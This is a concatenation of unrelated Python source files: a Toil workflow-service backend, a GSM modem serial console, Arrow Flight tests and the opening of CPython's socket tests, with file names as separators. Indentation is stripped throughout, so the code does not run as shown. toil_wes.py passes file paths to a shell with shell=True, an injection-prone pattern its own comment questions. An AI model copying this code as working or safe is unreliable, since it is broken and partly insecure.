def run_testing():
"""
Debugging for a specific dataset under specified configuration indices.
repeat 100 times for 3 folds
:return:
"""
for _ in range(100):
for train, test in KFoldSplit_df(data_isbsg10(), 3):
mre, sa, p = (testing(train, test, [1, 3, 2, 0, 0, 3]))
print(mre)
print(sa)
if __name__ == '__main__':
run()
# run_testing()
|
toil_wes.py
|
import os
import json
import uuid
import subprocess
import urllib
from multiprocessing import Process
import functools
import logging
import sys
import time
from six import iteritems
from cwltool.main import load_job_order
from argparse import Namespace
from wes_service.util import WESBackend
from wes_service.errors import MissingAuthorization
logging.basicConfig(level=logging.INFO)
class LocalFiles(object):
"""
Convenience class for (r)syncing local files to a server.
"""
def __init__(self,
input_json,
wftype,
dest='~',
keypath='$HOME/.ssh/westest.pem',
domain='ubuntu@54.193.12.111'):
self.json_path = input_json
self.keypath = keypath
self.domain = domain
self.dest = dest
self.wftype = wftype
self.cwl_filemap = {}
self.filelist = []
def run_rsync(self, files):
for f in files:
cmd = 'rsync -Pav -e "ssh -i {}" {} {}:{}'.format(self.keypath, f, self.domain, self.dest)
logging.info(cmd)
p = subprocess.Popen(cmd, shell=True) # shell=True may be insecure? need advice
p.communicate() # block til finished
def new_local_path(self, filepath):
"""Stores the path in a list and returns a path relative to self.dest."""
self.filelist.append(filepath)
return os.path.join(self.dest, os.path.basename(filepath))
def wdl_pathmap(self, input):
"""
Very naive gather of all local files included in a wdl json.
Expects a json-like dictionary as input.
These paths are stored as a list for later downloading.
"""
# TODO: Parse and validate wdl to determine type
if isinstance(input, basestring):
if input.startswith('file://'):
return self.new_local_path(input[7:])
elif os.path.isfile(input):
return self.new_local_path(input)
else:
return input
if isinstance(input, list):
j = []
for i in input:
j.append(self.wdl_pathmap(i))
return j
elif isinstance(input, dict):
for k, v in iteritems(input):
input[k] = self.wdl_pathmap(v)
return input
def cwl_pathmap(self, json_dict):
"""
Gather local files included in a cwl json.
Expects a json dictionary as input.
These paths are stored as a list for later downloading.
"""
assert isinstance(json_dict, dict)
# use cwltool to parse the json and gather the filepaths
options = Namespace(job_order=[self.json_path], basedir=None)
json_vars, options.basedir, loader = load_job_order(options, sys.stdin, None, [], options.job_order)
for j in json_vars:
if isinstance(json_vars[j], dict):
if json_vars[j]['class'] == 'File':
if json_vars[j]['path'].startswith('file://'):
self.cwl_filemap[j] = json_vars[j]['path'][7:]
# replace all local top level key 'path's with new paths.
for k in json_dict:
if isinstance(json_dict[k], dict):
if 'class' in json_dict[k]:
if json_dict[k]['class'] == 'File':
# assume that if k is not in self.cwl_filemap, it is a File, but not local (file://)
if k in self.cwl_filemap:
json_dict[k]['path'] = self.new_local_path(self.cwl_filemap[k])
return json_dict
def sync2server(self):
"""
1. Opens a json, saves all filepaths within it as a list.
2. Rsyncs all of these files to the server.
3. Generates a new json for use on the server with server local paths.
"""
with open(self.json_path, 'r') as json_data:
json_dict = json.load(json_data)
new_json = self.cwl_pathmap(json_dict)
with open(self.json_path + '.new', 'w') as f:
json.dump(new_json, f)
logging.info('Importing local files from: ' + str(self.json_path))
logging.info('To: {}:{}'.format(self.domain, self.dest))
logging.info('New json with updated (server) paths created: ' + str(self.json_path + '.new'))
self.run_rsync(set(self.filelist))
return self.json_path + '.new'
def catch_toil_exceptions(orig_func):
"""Catch uncaught exceptions and turn them into http errors"""
@functools.wraps(orig_func)
def catch_exceptions_wrapper(self, *args, **kwargs):
try:
return orig_func(self, *args, **kwargs)
except RuntimeError as e:
return {"msg": str(e), "status_code": 500}, 500
except subprocess.CalledProcessError as e:
return {"msg": str(e), "status_code": 500}, 500
except MissingAuthorization:
return {"msg": "'Authorization' header is missing or empty, "
"expecting Toil Auth token", "status_code": 401}, 401
return catch_exceptions_wrapper
class ToilWorkflow(object):
def __init__(self, workflow_id):
super(ToilWorkflow, self).__init__()
self.workflow_id = workflow_id
self.workdir = os.path.join(os.getcwd(), 'workflows', self.workflow_id)
self.outdir = os.path.join(self.workdir, 'outdir')
os.makedirs(self.outdir)
self.outfile = os.path.join(self.workdir, 'stdout')
self.errfile = os.path.join(self.workdir, 'stderr')
self.starttime = os.path.join(self.workdir, 'starttime')
self.endtime = os.path.join(self.workdir, 'endtime')
self.pidfile = os.path.join(self.workdir, 'pid')
self.cmdfile = os.path.join(self.workdir, 'cmd')
self.request_json = os.path.join(self.workdir, 'request.json')
def write_workflow(self, request_dict, wftype='cwl'):
"""Writes a cwl, wdl, or python file as appropriate from the request dictionary."""
wf_filename = os.path.join(self.workdir, 'workflow.' + wftype)
if request_dict.get('workflow_descriptor'):
workflow_descriptor = request_dict.get('workflow_descriptor')
with open(wf_filename, 'w') as f:
# FIXME #14 workflow_descriptor isn't defined
f.write(workflow_descriptor)
workflow_url = urllib.pathname2url(wf_filename)
else:
workflow_url = request_dict.get('workflow_url')
input_json = self.write_json(request_dict)
if workflow_url.startswith('file://'):
workflow_url = workflow_url[7:]
if wftype == 'py':
return [workflow_url]
else:
return [workflow_url, input_json]
def write_json(self, request_dict):
input_json = os.path.join(self.workdir, 'input.json')
with open(input_json, 'w') as inputtemp:
json.dump(request_dict['workflow_params'], inputtemp)
return input_json
def call_cmd(self, cmd):
"""
Calls a command with Popen.
Writes stdout, stderr, and the command to separate files.
:param cmd: A string or array of strings.
:return: The pid of the command.
"""
with open(self.cmdfile, 'w') as f:
f.write(str(cmd))
stdout = open(self.outfile, 'w')
stderr = open(self.errfile, 'w')
logging.info('Calling: ' + ' '.join(cmd))
process = subprocess.Popen(cmd,
stdout=stdout,
stderr=stderr,
close_fds=True,
cwd=self.outdir)
stdout.close()
stderr.close()
return process.pid
def run(self, request_dict, opts):
wftype = request_dict['workflow_type'].lower().strip()
version = request_dict['workflow_type_version']
if version != 'v1.0' and wftype in ('cwl', 'wdl'):
raise RuntimeError('workflow_type "cwl", "wdl" requires '
'"workflow_type_version" to be "v1.0": ' + str(version))
if version != '2.7' and wftype == 'py':
raise RuntimeError('workflow_type "py" requires '
'"workflow_type_version" to be "2.7": ' + str(version))
if wftype in ('cwl', 'wdl'):
runner = ['toil-' + wftype + '-runner']
elif wftype == 'py':
runner = ['python']
else:
raise RuntimeError('workflow_type is not "cwl", "wdl", or "py": ' + str(wftype))
logging.info('Beginning Toil Workflow ID: ' + str(self.workflow_id))
with open(self.starttime, 'w') as f:
f.write(str(time.time()))
with open(self.request_json, 'w') as f:
json.dump(request_dict, f)
# write cwl/wdl, as appropriate
input_wf = self.write_workflow(request_dict, wftype=wftype)
cmd = runner + opts.getoptlist('extra') + input_wf
pid = self.call_cmd(cmd)
with open(self.endtime, 'w') as f:
f.write(str(time.time()))
with open(self.pidfile, 'w') as f:
f.write(str(pid))
return self.getstatus()
def getstate(self):
"""
Returns RUNNING, -1
COMPLETE, 0
or
EXECUTOR_ERROR, 255
"""
state = "RUNNING"
exit_code = -1
exitcode_file = os.path.join(self.workdir, "exit_code")
pid_file = os.path.join(self.workdir, "pid")
if os.path.exists(exitcode_file):
with open(exitcode_file) as f:
exit_code = int(f.read())
elif os.path.exists(pid_file):
with open(pid_file, "r") as pid:
pid = int(pid.read())
try:
(_pid, exit_status) = os.waitpid(pid, os.WNOHANG)
if _pid != 0:
exit_code = exit_status >> 8
with open(exitcode_file, "w") as f:
f.write(str(exit_code))
os.unlink(pid_file)
except OSError:
os.unlink(pid_file)
exit_code = 255
if exit_code == 0:
state = "COMPLETE"
elif exit_code != -1:
state = "EXECUTOR_ERROR"
return state, exit_code
def getstatus(self):
state, exit_code = self.getstate()
return {
"workflow_id": self.workflow_id,
"state": state
}
def cancel(self):
pass
def getlog(self):
state, exit_code = self.getstate()
if os.path.exists(self.request_json):
with open(self.request_json, 'r') as f:
request = json.load(f)
with open(self.errfile, 'r') as f:
stderr = f.read()
with open(self.cmdfile, 'r') as f:
cmd = f.read()
with open(self.starttime, 'r') as f:
starttime = f.read()
with open(self.endtime, 'r') as f:
endtime = f.read()
else:
request = ''
stderr = ''
cmd = ['']
starttime = ''
endtime = ''
outputobj = {}
if state == 'COMPLETE':
with open(self.outfile, 'r') as outputtemp:
outputobj = json.load(outputtemp)
return {
'workflow_id': self.workflow_id,
'request': request,
'state': state,
'workflow_log': {
'cmd': cmd,
'start_time': starttime,
'end_time': endtime,
'stdout': '',
'stderr': stderr,
'exit_code': exit_code
},
'task_logs': [],
'outputs': outputobj
}
class ToilBackend(WESBackend):
processes = {}
def GetServiceInfo(self):
return {
'workflow_type_versions': {
'CWL': {'workflow_type_version': ['v1.0']},
'WDL': {'workflow_type_version': ['v1.0']},
'py': {'workflow_type_version': ['2.7']}
},
'supported_wes_versions': '0.3.0',
'supported_filesystem_protocols': ['file', 'http', 'https'],
'engine_versions': ['3.16.0'],
'system_state_counts': {},
'key_values': {}
}
@catch_toil_exceptions
def ListWorkflows(self):
# FIXME #15 results don't page
workflows = []
for l in os.listdir(os.path.join(os.getcwd(), 'workflows')):
if os.path.isdir(os.path.join(os.getcwd(), 'workflows', l)):
w = ToilWorkflow(l)
workflows.append({'workflow_id': w.workflow_id, 'state': w.getstate()[0]})
return {
'workflows': workflows,
'next_page_token': ''
}
# @catch_toil_exceptions
# def RunWorkflow(self, body):
# # FIXME Add error responses #16
# workflow_id = uuid.uuid4().hex
# job = ToilWorkflow(workflow_id)
# job.run(body, self)
# return {"workflow_id": workflow_id}
@catch_toil_exceptions
def RunWorkflow(self, body):
workflow_id = uuid.uuid4().hex
job = ToilWorkflow(workflow_id)
p = Process(target=job.run, args=(body, self))
p.start()
self.processes[workflow_id] = p
return {'workflow_id': workflow_id}
@catch_toil_exceptions
def GetWorkflowLog(self, workflow_id):
job = ToilWorkflow(workflow_id)
return job.getlog()
@catch_toil_exceptions
def CancelJob(self, workflow_id):
# should this block with `p.is_alive()`?
if workflow_id in self.processes:
self.processes[workflow_id].terminate()
return {'workflow_id': workflow_id}
@catch_toil_exceptions
def GetWorkflowStatus(self, workflow_id):
job = ToilWorkflow(workflow_id)
return job.getstatus()
def create_backend(app, opts):
return ToilBackend(opts)
|
gsm.py
|
import serial
import time
from threading import Thread, Lock
from curses import ascii
# Enable Serial Communication
ser = serial.Serial()
ser.port = "/dev/ttyAMA0"
ser.baudrate = 115200
ser.timeout = 1
def doRead(ser, lock):
while True:
lock.acquire()
try:
rcv = ser.readline().decode().strip('\n')
except:
pass
else:
while rcv != '':
print(rcv)
rcv = ser.readline().decode().strip('\n').strip('\r')
lock.release()
time.sleep(.15)
ser.open()
ser_lock = Lock()
th = Thread(target=doRead, args=(ser, ser_lock))
th.daemon = True
th.start()
gotlock = ser_lock.acquire()
ser.write(b'AT+CMGF=1\r')
ser.write(b'AT+CPMS="ME","SM","ME"\r')
ser_lock.release()
time.sleep(.15)
try:
ser_lock.acquire()
except:
time.sleep(.1)
else:
ser.write(b'AT+CPIN?\r')
ser_lock.release()
time.sleep(.15)
while True:
try:
cmd = input()
except:
pass
else:
ser_lock.acquire()
if '^z' in cmd:
ser.write(bytes('{}\r'.format(ascii.ctrl('z')), 'utf-8'))
else:
ser.write(bytes('{}\r'.format(cmd), 'utf-8'))
ser_lock.release()
time.sleep(.15)
|
test_flight.py
|
# -*- coding: utf-8 -*-
# Licensed to the Apache Software Foundation (ASF) under one
# or more contributor license agreements. See the NOTICE file
# distributed with this work for additional information
# regarding copyright ownership. The ASF licenses this file
# to you under the Apache License, Version 2.0 (the
# "License"); you may not use this file except in compliance
# with the License. You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing,
# software distributed under the License is distributed on an
# "AS IS" BASIS, WITHOUT WARRANTIES OR CONDITIONS OF ANY
# KIND, either express or implied. See the License for the
# specific language governing permissions and limitations
# under the License.
import contextlib
import socket
import threading
import pytest
import pyarrow as pa
flight = pytest.importorskip("pyarrow.flight")
class ConstantFlightServer(flight.FlightServerBase):
"""A Flight server that always returns the same data.
See ARROW-4796: this server implementation will segfault if Flight
does not properly hold a reference to the Table object.
"""
def do_get(self, ticket):
data = [
pa.array([-10, -5, 0, 5, 10])
]
table = pa.Table.from_arrays(data, names=['a'])
return flight.RecordBatchStream(table)
class EchoFlightServer(flight.FlightServerBase):
"""A Flight server that returns the last data uploaded."""
def __init__(self):
super(EchoFlightServer, self).__init__()
self.last_message = None
def do_get(self, ticket):
return flight.RecordBatchStream(self.last_message)
def do_put(self, descriptor, reader):
self.last_message = reader.read_all()
@contextlib.contextmanager
def flight_server(server_base, *args, **kwargs):
"""Spawn a Flight server on a free port, shutting it down when done."""
# Find a free port
sock = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
with contextlib.closing(sock) as sock:
sock.bind(('', 0))
sock.setsockopt(socket.SOL_SOCKET, socket.SO_REUSEADDR, 1)
port = sock.getsockname()[1]
server_instance = server_base(*args, **kwargs)
def _server_thread():
server_instance.run(port)
thread = threading.Thread(target=_server_thread, daemon=True)
thread.start()
yield port
server_instance.shutdown()
thread.join()
def test_flight_do_get():
"""Try a simple do_get call."""
data = [
pa.array([-10, -5, 0, 5, 10])
]
table = pa.Table.from_arrays(data, names=['a'])
with flight_server(ConstantFlightServer) as server_port:
client = flight.FlightClient.connect('localhost', server_port)
data = client.do_get(flight.Ticket(b''), table.schema).read_all()
assert data.equals(table)
@pytest.mark.slow
def test_flight_large_message():
"""Try sending/receiving a large message via Flight.
See ARROW-4421: by default, gRPC won't allow us to send messages >
4MiB in size.
"""
data = pa.Table.from_arrays([
pa.array(range(0, 10 * 1024 * 1024))
], names=['a'])
with flight_server(EchoFlightServer) as server_port:
client = flight.FlightClient.connect('localhost', server_port)
writer = client.do_put(flight.FlightDescriptor.for_path('test'),
data.schema)
# Write a single giant chunk
writer.write_table(data, 10 * 1024 * 1024)
writer.close()
result = client.do_get(flight.Ticket(b''), data.schema).read_all()
assert result.equals(data)
|
test_socket.py
|
import unittest
from test import support
import errno
import io
import itertools
import socket
import select
import tempfile
import time
import traceback
import queue
import sys
import os
import platform
import array
import contextlib
from weakref import proxy
import signal
import math
import pickle
import struct
import random
import shutil
import string
import _thread as thread
import threading
try:
import multiprocessing
except ImportError:
multiprocessing = False
try:
import fcntl
except ImportError:
fcntl = None
HOST = support.HOST
# test unicode string and carriage return
MSG = 'Michael Gilfix was here\u1234\r\n'.encode('utf-8')
MAIN_TIMEOUT = 60.0
VSOCKPORT = 1234
AIX = platform.system() == "AIX"
try:
import _socket
except ImportError:
_socket = None
def get_cid():
if fcntl is None:
return None
if not hasattr(socket, 'IOCTL_VM_SOCKETS_GET_LOCAL_CID'):
return None
try:
with open("/dev/vsock", "rb") as f:
r = fcntl.ioctl(f, socket.IOCTL_VM_SOCKETS_GET_LOCAL_CID, " ")
except OSError:
return None
else:
return struct.unpack("I", r)[0]
def _have_socket_can():
"""Check whether CAN sockets are supported on this host."""
try:
s = socket.socket(socket.PF_CAN, socket.SOCK_RAW, socket.CAN_RAW)
except (AttributeError, OSError):
return False
else:
s.close()
return True
def _have_socket_can_isotp():
"""Check whether CAN ISOTP sockets are supported on this host."""
try:
s = socket.socket(socket.PF_CAN, socket.SOCK_DGRAM, socket.CAN_ISOTP)
except (AttributeError, OSError):
return False
else:
s.close()
return True
def _have_socket_rds():
"""Check whether RDS sockets are supported on this host."""
try:
s = socket.socket(socket.PF_RDS, socket.SOCK_SEQPACKET, 0)
except (AttributeError, OSError):
return False
else:
s.close()
return True
def _have_socket_alg():
"""Check whether AF_ALG sockets are supported on this host."""
try:
s = socket.socket(socket.AF_ALG, socket.SOCK_SEQPACKET, 0)
except (AttributeError, OSError):
return False
else:
s.close()
return True
def _have_socket_qipcrtr():
"""Check whether AF_QIPCRTR sockets are supported on this host."""
try:
s = socket.socket(socket.AF_QIPCRTR, socket.SOCK_DGRAM, 0)
except (AttributeError, OSError):
return False
else:
s.close()
return True
def _have_socket_vsock():
"""Check whether AF_VSOCK sockets are supported on this host."""
ret = get_cid() is not None
return ret
@contextlib.contextmanager
def socket_setdefaulttimeout(timeout):
old_timeout = socket.getdefaulttimeout()
try:
socket.setdefaulttimeout(timeout)
yield
finally:
socket.setdefaulttimeout(old_timeout)
HAVE_SOCKET_CAN = _have_socket_can()
HAVE_SOCKET_CAN_ISOTP = _have_socket_can_isotp()
HAVE_SOCKET_RDS = _have_socket_rds()
HAVE_SOCKET_ALG = _have_socket_alg()
HAVE_SOCKET_QIPCRTR = _have_socket_qipcrtr()
HAVE_SOCKET_VSOCK = _have_socket_vsock()
# Size in bytes of the int type
SIZEOF_INT = array.array("i").itemsize
class SocketTCPTest(unittest.TestCase):
def setUp(self):
self.serv = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
self.port = support.bind_port(self.serv)
self.serv.listen()
def tearDown(self):
self.serv.close()
self.serv = None
class SocketUDPTest(unittest.TestCase):
def setUp(self):
self.serv = socket.socket(socket.AF_INET, socket.SOCK_DGRAM)
self.port = support.bind_port(self.serv)
def tearDown(self):
self.serv.close()
self.serv = None
class ThreadSafeCleanupTestCase(unittest.TestCase):
"""Subclass of unittest.TestCase with thread-safe cleanup methods.
This subclass protects the addCleanup() and doCleanups() methods
with a recursive lock.
"""
def __init__(self, *args, **kwargs):
super().__init__(*args, **kwargs)
self._cleanup_lock = threading.RLock()
def addCleanup(self, *args, **kwargs):
with self._cleanup_lock:
return super().addCleanup(*args, **kwargs)
def doCleanups(self, *args, **kwargs):
with self._cleanup_lock:
return super().doCleanups(*args, **kwargs)
class SocketCANTest(unittest.TestCase):
"""To be able to run this test, a `vcan0` CAN interface can be created with
the following commands:
# modprobe vcan
# ip link add dev vcan0 type vcan
# ip link set up vcan0
"""
interface = 'vcan0'
bufsize = 128
"""The CAN frame structure is defined in <linux/can.h>:
struct can_frame {
canid_t can_id; /* 32 bit CAN_ID + EFF/RTR/ERR flags */
__u8 can_dlc; /* data length code: 0 .. 8 */
__u8 data[8] __attribute__((aligned(8)));
};
"""
can_frame_fmt = "=IB3x8s"
can_frame_size = struct.calcsize(can_frame_fmt)
"""The Broadcast Management Command frame structure is defined
in <linux/can/bcm.h>:
struct bcm_msg_head {
__u32 opcode;
__u32 flags;
__u32 count;
struct timeval ival1, ival2;
canid_t can_id;
__u32 nframes;
struct can_frame frames[0];
}
`bcm_msg_head` must be 8 bytes aligned because of the `frames` member (see
`struct can_frame` definition). Must use native not standard types for packing.
"""
bcm_cmd_msg_fmt = "@3I4l2I"
bcm_cmd_msg_fmt += "x" * (struct.calcsize(bcm_cmd_msg_fmt) % 8)
def setUp(self):
self.s = socket.socket(socket.PF_CAN, socket.SOCK_RAW, socket.CAN_RAW)
self.addCleanup(self.s.close)
try:
self.s.bind((self.interface,))
except OSError:
self.skipTest('network interface `%s` does not exist' %
self.interface)
class SocketRDSTest(unittest.TestCase):
"""To be able to run this test, the `rds` kernel module must be loaded:
# modprobe rds
"""
bufsize = 8192
def setUp(self):
self.serv = socket.socket(socket.PF_RDS, socket.SOCK_SEQPACKET, 0)
self.addCleanup(self.serv.close)
try:
self.port = support.bind_port(self.serv)
except OSError:
self.skipTest('unable to bind RDS socket')
class ThreadableTest:
"""Threadable Test class
The ThreadableTest class makes it easy to create a threaded
client/server pair from an existing unit test. To create a
new threaded class from an existing unit test, use multiple
inheritance:
class NewClass (OldClass, ThreadableTest):
pass
This class defines two new fixture functions with obvious
purposes for overriding:
clientSetUp ()
clientTearDown ()
Any new test functions within the class must then define
tests in pairs, where the test name is preceded with a
'_' to indicate the client portion of the test. Ex:
def testFoo(self):
# Server portion
def _testFoo(self):
# Client portion
Any exceptions raised by the clients during their tests
are caught and transferred to the main thread to alert
the testing framework.
Note, the server setup function cannot call any blocking
functions that rely on the client thread during setup,
unless serverExplicitReady() is called just before
the blocking call (such as in setting up a client/server
connection and performing the accept() in setUp().
"""
def __init__(self):
# Swap the true setup function
self.__setUp = self.setUp
self.__tearDown = self.tearDown
self.setUp = self._setUp
self.tearDown = self._tearDown
def serverExplicitReady(self):
"""This method allows the server to explicitly indicate that
it wants the client thread to proceed. This is useful if the
server is about to execute a blocking routine that is
dependent upon the client thread during its setup routine."""
self.server_ready.set()
def _setUp(self):
self.wait_threads = support.wait_threads_exit()
self.wait_threads.__enter__()
self.server_ready = threading.Event()
self.client_ready = threading.Event()
self.done = threading.Event()
self.queue = queue.Queue(1)
self.server_crashed = False
# Do some munging to start the client test.
methodname = self.id()
i = methodname.rfind('.')
methodname = methodname[i+1:]
test_method = getattr(self, '_' + methodname)
self.client_thread = thread.start_new_thread(
self.clientRun, (test_method,))
try:
self.__setUp()
except:
self.server_crashed = True
raise
finally:
self.server_ready.set()
self.client_ready.wait()
def _tearDown(self):
self.__tearDown()
self.done.wait()
self.wait_threads.__exit__(None, None, None)
if self.queue.qsize():
exc = self.queue.get()
raise exc
def clientRun(self, test_func):
self.server_ready.wait()
try:
self.clientSetUp()
except BaseException as e:
self.queue.put(e)
self.clientTearDown()
return
finally:
self.client_ready.set()
if self.server_crashed:
self.clientTearDown()
return
if not hasattr(test_func, '__call__'):
raise TypeError("test_func must be a callable function")
try:
test_func()
except BaseException as e:
self.queue.put(e)
finally:
self.clientTearDown()
def clientSetUp(self):
raise NotImplementedError("clientSetUp must be implemented.")
def clientTearDown(self):
self.done.set()
thread.exit()
class ThreadedTCPSocketTest(SocketTCPTest, ThreadableTest):
def __init__(self, methodName='runTest'):
SocketTCPTest.__init__(self, methodName=methodName)
ThreadableTest.__init__(self)
def clientSetUp(self):
self.cli = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
def clientTearDown(self):
self.cli.close()
self.cli = None
ThreadableTest.clientTearDown(self)
class ThreadedUDPSocketTest(SocketUDPTest, ThreadableTest):
def __init__(self, methodName='runTest'):
SocketUDPTest.__init__(self, methodName=methodName)
ThreadableTest.__init__(self)
def clientSetUp(self):
self.cli = socket.socket(socket.AF_INET, socket.SOCK_DGRAM)
def clientTearDown(self):
self.cli.close()
self.cli = None
ThreadableTest.clientTearDown(self)
class ThreadedCANSocketTest(SocketCANTest, ThreadableTest):
def __init__(self, methodName='runTest'):
SocketCANTest.__init__(self, methodName=methodName)
ThreadableTest.__init__(self)
def clientSetUp(self):
self.cli = socket.socket(socket.PF_CAN, socket.SOCK_RAW, socket.CAN_RAW)
try:
self.cli.bind((self.interface,))
except OSError:
# skipTest should not be called here, and will be called in the
# server instead
pass
def clientTearDown(self):
self.cli.close()
self.cli = None
ThreadableTest.clientTearDown(self)
class ThreadedRDSSocketTest(SocketRDSTest, ThreadableTest):
def __init__(self, methodName='runTest'):
SocketRDSTest.__init__(self, methodName=methodName)
ThreadableTest.__init__(self)
def clientSetUp(self):
self.cli = socket.socket(socket.PF_RDS, socket.SOCK_SEQPACKET, 0)
try:
# RDS sockets must be bound explicitly to send or receive data
self.cli.bind((HOST, 0))
self.cli_addr = self.cli.getsockname()
except OSError:
# skipTest should not be called here, and will be called in the
# server instead
pass
def clientTearDown(self):
self.cli.close()
self.cli = None
ThreadableTest.clientTearDown(self)
@unittest.skipIf(fcntl is None, "need fcntl")
@unittest.skipUnless(HAVE_SOCKET_VSOCK,
'VSOCK sockets required for this test.')
@unittest.skipUnless(get_cid() != 2,
"This test can only be run on a virtual guest.")
class ThreadedVSOCKSocketStreamTest(unittest.TestCase, ThreadableTest):
def __init__(self, methodName='runTest'):
unittest.TestCase.__init__(self, methodName=methodName)
ThreadableTest.__init__(self)
def setUp(self):
self.serv = socket.socket(socket.AF_VSOCK, socket.SOCK_STREAM)
self.addCleanup(self.serv.close)
self.serv.bind((socket.VMADDR_CID_ANY, VSOCKPORT))
self.serv.listen()
self.serverExplicitReady()
self.conn, self.connaddr = self.serv.accept()
self.addCleanup(self.conn.close)
def clientSetUp(self):
time.sleep(0.1)
self.cli = socket.socket(socket.AF_VSOCK, socket.SOCK_STREAM)
self.addCleanup(self.cli.close)
cid = get_cid()
self.cli.connect((cid, VSOCKPORT))
def testStream(self):
msg = self.conn.recv(1024)
self.assertEqual(msg, MSG)
def _testStream(self):
self.cli.send(MSG)
self.cli.close()
class SocketConnectedTest(ThreadedTCPSocketTest):
"""Socket tests for client-server connection.
self.cli_conn is a client socket connected to the server. The
setUp() method guarantees that it is connected to the server.
"""
def __init__(self, methodName='runTest'):
ThreadedTCPSocketTest.__init__(self, methodName=methodName)
def setUp(self):
ThreadedTCPSocketTest.setUp(self)
# Indicate explicitly we're ready for the client thread to
# proceed and then perform the blocking call to accept
self.serverExplicitReady()
conn, addr = self.serv.accept()
self.cli_conn = conn
def tearDown(self):
self.cli_conn.close()
self.cli_conn = None
ThreadedTCPSocketTest.tearDown(self)
def clientSetUp(self):
ThreadedTCPSocketTest.clientSetUp(self)
self.cli.connect((HOST, self.port))
self.serv_conn = self.cli
def clientTearDown(self):
self.serv_conn.close()
self.serv_conn = None
ThreadedTCPSocketTest.clientTearDown(self)
class SocketPairTest(unittest.TestCase, ThreadableTest):
def __init__(self, methodName='runTest'):
unittest.TestCase.__init__(self, methodName=methodName)
ThreadableTest.__init__(self)
def setUp(self):
self.serv, self.cli = socket.socketpair()
def tearDown(self):
self.serv.close()
self.serv = None
def clientSetUp(self):
pass
def clientTearDown(self):
self.cli.close()
self.cli = None
ThreadableTest.clientTearDown(self)
# The following classes are used by the sendmsg()/recvmsg() tests.
# Combining, for instance, ConnectedStreamTestMixin and TCPTestBase
# gives a drop-in replacement for SocketConnectedTest, but different
# address families can be used, and the attributes serv_addr and
# cli_addr will be set to the addresses of the endpoints.
class SocketTestBase(unittest.TestCase):
"""A base class for socket tests.
Subclasses must provide methods newSocket() to return a new socket
and bindSock(sock) to bind it to an unused address.
Creates a socket self.serv and sets self.serv_addr to its address.
"""
def setUp(self):
self.serv = self.newSocket()
self.bindServer()
def bindServer(self):
"""Bind server socket and set self.serv_addr to its address."""
self.bindSock(self.serv)
self.serv_addr = self.serv.getsockname()
def tearDown(self):
self.serv.close()
self.serv = None
class SocketListeningTestMixin(SocketTestBase):
"""Mixin to listen on the server socket."""
def setUp(self):
super().setUp()
self.serv.listen()
class ThreadedSocketTestMixin(ThreadSafeCleanupTestCase, SocketTestBase,
ThreadableTest):
"""Mixin to add client socket and allow client/server tests.
Client socket is self.cli and its address is self.cli_addr. See
ThreadableTest for usage information.
"""
def __init__(self, *args, **kwargs):
super().__init__(*args, **kwargs)
ThreadableTest.__init__(self)
def clientSetUp(self):
self.cli = self.newClientSocket()
self.bindClient()
def newClientSocket(self):
"""Return a new socket for use as client."""
return self.newSocket()
def bindClient(self):
"""Bind client socket and set self.cli_addr to its address."""
self.bindSock(self.cli)
self.cli_addr = self.cli.getsockname()
def clientTearDown(self):
self.cli.close()
self.cli = None
ThreadableTest.clientTearDown(self)
class ConnectedStreamTestMixin(SocketListeningTestMixin,
ThreadedSocketTestMixin):
"""Mixin to allow client/server stream tests with connected client.
Server's socket representing connection to client is self.cli_conn
and client's connection to server is self.serv_conn. (Based on
SocketConnectedTest.)
"""
def setUp(self):
super().setUp()
# Indicate explicitly we're ready for the client thread to
# proceed and then perform the blocking call to accept
self.serverExplicitReady()
conn, addr = self.serv.accept()
self.cli_conn = conn
def tearDown(self):
self.cli_conn.close()
self.cli_conn = None
super().tearDown()
def clientSetUp(self):
super().clientSetUp()
self.cli.connect(self.serv_addr)
self.serv_conn = self.cli
def clientTearDown(self):
try:
self.serv_conn.close()
self.serv_conn = None
except AttributeError:
pass
super().clientTearDown()
class UnixSocketTestBase(SocketTestBase):
"""Base class for Unix-domain socket tests."""
# This class is used for file descriptor passing tests, so we
# create the sockets in a private directory so that other users
# can't send anything that might be problematic for a privileged
# user running the tests.
def setUp(self):
self.dir_path = tempfile.mkdtemp()
self.addCleanup(os.rmdir, self.dir_path)
super().setUp()
def bindSock(self, sock):
path = tempfile.mktemp(dir=self.dir_path)
support.bind_unix_socket(sock, path)
self.addCleanup(support.unlink, path)
class UnixStreamBase(UnixSocketTestBase):
"""Base class for Unix-domain SOCK_STREAM tests."""
def newSocket(self):
return socket.socket(socket.AF_UNIX, socket.SOCK_STREAM)
class InetTestBase(SocketTestBase):
"""Base class for IPv4 socket tests."""
host = HOST
def setUp(self):
super().setUp()
self.port = self.serv_addr[1]
def bindSock(self, sock):
support.bind_port(sock, host=self.host)
class TCPTestBase(InetTestBase):
"""Base class for TCP-over-IPv4 tests."""
def newSocket(self):
return socket.socket(socket.AF_INET, socket.SOCK_STREAM)
class UDPTestBase(InetTestBase):
"""Base class for UDP-over-IPv4 tests."""
def newSocket(self):
return socket.socket(socket.AF_INET, socket.SOCK_DGRAM)
class SCTPStreamBase(InetTestBase):
"""Base class for SCTP tests in one-to-one (SOCK_STREAM) mode."""
def newSocket(self):
return socket.socket(socket.AF_INET, socket.SOCK_STREAM,
socket.IPPROTO_SCTP)
class Inet6TestBase(InetTestBase):
"""Base class for IPv6 socket tests."""
host = support.HOSTv6
class UDP6TestBase(Inet6TestBase):
"""Base class for UDP-over-IPv6 tests."""
def newSocket(self):
return socket.socket(socket.AF_INET6, socket.SOCK_DGRAM)
# Test-skipping decorators for use with ThreadableTest.
def skipWithClientIf(condition, reason):
"""Skip decorated test if condition is true, add client_skip decorator.
If the decorated object is not a class, sets its attribute
"client_skip" to a decorator which will return an empty function
if the test is to be skipped, or the original function if it is
not. This can be used to avoid running the client part of a
skipped test when using ThreadableTest.
"""
def client_pass(*args, **kwargs):
pass
def skipdec(obj):
retval = unittest.skip(reason)(obj)
if not isinstance(obj, type):
retval.client_skip = lambda f: client_pass
return retval
def noskipdec(obj):
if not (isinstance(obj, type) or hasattr(obj, "client_skip")):
obj.client_skip = lambda f: f
return obj
return skipdec if condition else noskipdec
def requireAttrs(obj, *attributes):
"""Skip decorated test if obj is missing any of the given attributes.
Sets client_skip attribute as skipWithClientIf() does.
"""
missing = [name for name in attributes if not hasattr(obj, name)]
return skipWithClientIf(
